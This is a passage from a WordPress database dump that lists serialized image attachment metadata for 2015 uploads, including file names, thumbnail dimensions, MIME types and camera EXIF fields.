:\"height\";i:160;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:61:\"11817212_407467352784092_7088324366362359981_n-11-300x235.png\";s:5:\"width\";i:300;s:6:\"height\";i:235;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:61:\"11817212_407467352784092_7088324366362359981_n-11-300x220.png\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:61:\"11817212_407467352784092_7088324366362359981_n-11-300x261.png\";s:5:\"width\";i:300;s:6:\"height\";i:261;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2268,397,'_wp_attached_file','2015/07/Screen-Shot-2015-10-12-at-4.42.11-PM.png'),(2269,397,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:603;s:6:\"height\";i:302;s:4:\"file\";s:48:\"2015/07/Screen-Shot-2015-10-12-at-4.42.11-PM.png\";s:5:\"sizes\";a:13:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.42.11-PM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.42.11-PM-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:46:\"Screen-Shot-2015-10-12-at-4.42.11-PM-80x60.png\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:47:\"Screen-Shot-2015-10-12-at-4.42.11-PM-100x70.png\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.42.11-PM-218x150.png\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.42.11-PM-265x198.png\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.42.11-PM-324x160.png\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.42.11-PM-324x235.png\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.42.11-PM-324x302.png\";s:5:\"width\";i:324;s:6:\"height\";i:302;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.42.11-PM-356x220.png\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.42.11-PM-356x302.png\";s:5:\"width\";i:356;s:6:\"height\";i:302;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.42.11-PM-533x261.png\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.42.11-PM-534x302.png\";s:5:\"width\";i:534;s:6:\"height\";i:302;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2270,398,'_wp_attached_file','2015/07/Screen-Shot-2015-10-12-at-4.43.27-PM.png'),(2271,398,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:528;s:6:\"height\";i:655;s:4:\"file\";s:48:\"2015/07/Screen-Shot-2015-10-12-at-4.43.27-PM.png\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.43.27-PM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.43.27-PM-242x300.png\";s:5:\"width\";i:242;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:46:\"Screen-Shot-2015-10-12-at-4.43.27-PM-80x60.png\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:47:\"Screen-Shot-2015-10-12-at-4.43.27-PM-100x70.png\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.43.27-PM-218x150.png\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.43.27-PM-265x198.png\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.43.27-PM-324x160.png\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.43.27-PM-324x235.png\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.43.27-PM-324x400.png\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.43.27-PM-356x220.png\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.43.27-PM-356x364.png\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.43.27-PM-528x261.png\";s:5:\"width\";i:528;s:6:\"height\";i:261;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.43.27-PM-528x462.png\";s:5:\"width\";i:528;s:6:\"height\";i:462;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.43.27-PM-528x385.png\";s:5:\"width\";i:528;s:6:\"height\";i:385;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.43.27-PM-528x486.png\";s:5:\"width\";i:528;s:6:\"height\";i:486;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.43.27-PM-528x580.png\";s:5:\"width\";i:528;s:6:\"height\";i:580;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-12-at-4.43.27-PM-339x420.png\";s:5:\"width\";i:339;s:6:\"height\";i:420;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2272,399,'_wp_attached_file','2015/07/iStock_000008906483_Small.jpg'),(2273,399,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:899;s:6:\"height\";i:534;s:4:\"file\";s:37:\"2015/07/iStock_000008906483_Small.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"iStock_000008906483_Small-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"iStock_000008906483_Small-300x178.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:178;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"iStock_000008906483_Small-768x456.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:456;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:35:\"iStock_000008906483_Small-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:36:\"iStock_000008906483_Small-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:37:\"iStock_000008906483_Small-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:37:\"iStock_000008906483_Small-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:37:\"iStock_000008906483_Small-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:37:\"iStock_000008906483_Small-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:37:\"iStock_000008906483_Small-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:37:\"iStock_000008906483_Small-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:37:\"iStock_000008906483_Small-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:37:\"iStock_000008906483_Small-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:37:\"iStock_000008906483_Small-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:37:\"iStock_000008906483_Small-696x413.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:413;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:37:\"iStock_000008906483_Small-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:37:\"iStock_000008906483_Small-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:37:\"iStock_000008906483_Small-707x420.jpg\";s:5:\"width\";i:707;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:22:\"Canon EOS 400D DIGITAL\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1237724289\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"73\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:15:\"0.0333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2289,402,'_wp_attached_file','2015/10/hed.jpg'),(2290,402,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:400;s:4:\"file\";s:15:\"2015/10/hed.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"hed-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"hed-300x171.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:13:\"hed-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:14:\"hed-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:15:\"hed-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:15:\"hed-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:15:\"hed-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:15:\"hed-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:15:\"hed-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:15:\"hed-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:15:\"hed-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:15:\"hed-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:15:\"hed-534x400.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:15:\"hed-696x398.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:15:\"hed-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2299,408,'_wp_attached_file','2015/10/Screen-Shot-2015-10-13-at-9.08.34-AM.png'),(2300,408,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:725;s:6:\"height\";i:372;s:4:\"file\";s:48:\"2015/10/Screen-Shot-2015-10-13-at-9.08.34-AM.png\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-13-at-9.08.34-AM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-13-at-9.08.34-AM-300x154.png\";s:5:\"width\";i:300;s:6:\"height\";i:154;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:46:\"Screen-Shot-2015-10-13-at-9.08.34-AM-80x60.png\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:47:\"Screen-Shot-2015-10-13-at-9.08.34-AM-100x70.png\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-13-at-9.08.34-AM-218x150.png\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-13-at-9.08.34-AM-265x198.png\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-13-at-9.08.34-AM-324x160.png\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-13-at-9.08.34-AM-324x235.png\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-13-at-9.08.34-AM-324x372.png\";s:5:\"width\";i:324;s:6:\"height\";i:372;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-13-at-9.08.34-AM-356x220.png\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-13-at-9.08.34-AM-356x364.png\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-13-at-9.08.34-AM-533x261.png\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-13-at-9.08.34-AM-534x372.png\";s:5:\"width\";i:534;s:6:\"height\";i:372;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-13-at-9.08.34-AM-696x357.png\";s:5:\"width\";i:696;s:6:\"height\";i:357;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2015-10-13-at-9.08.34-AM-696x372.png\";s:5:\"width\";i:696;s:6:\"height\";i:372;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2312,411,'_edit_lock','1446220949:6'),(2313,411,'_edit_last','6'),(2314,412,'_wp_attached_file','2015/10/Eminem.jpg'),(2315,412,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:18:\"2015/10/Eminem.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"Eminem-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"Eminem-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:16:\"Eminem-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:17:\"Eminem-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:18:\"Eminem-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:18:\"Eminem-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:18:\"Eminem-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:18:\"Eminem-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:18:\"Eminem-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:18:\"Eminem-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:18:\"Eminem-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:18:\"Eminem-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:18:\"Eminem-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:18:\"Eminem-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:18:\"Eminem-560x420.jpg\";s:5:\"width\";i:560;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2316,413,'_wp_attached_file','2015/10/Eminem_.jpg'),(2317,413,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:375;s:6:\"height\";i:500;s:4:\"file\";s:19:\"2015/10/Eminem_.jpg\";s:5:\"sizes\";a:16:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Eminem_-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Eminem_-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:17:\"Eminem_-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:18:\"Eminem_-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:19:\"Eminem_-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:19:\"Eminem_-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:19:\"Eminem_-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:19:\"Eminem_-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:19:\"Eminem_-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:19:\"Eminem_-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:19:\"Eminem_-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:19:\"Eminem_-375x261.jpg\";s:5:\"width\";i:375;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:19:\"Eminem_-375x462.jpg\";s:5:\"width\";i:375;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:19:\"Eminem_-375x385.jpg\";s:5:\"width\";i:375;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:19:\"Eminem_-375x486.jpg\";s:5:\"width\";i:375;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:19:\"Eminem_-315x420.jpg\";s:5:\"width\";i:315;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\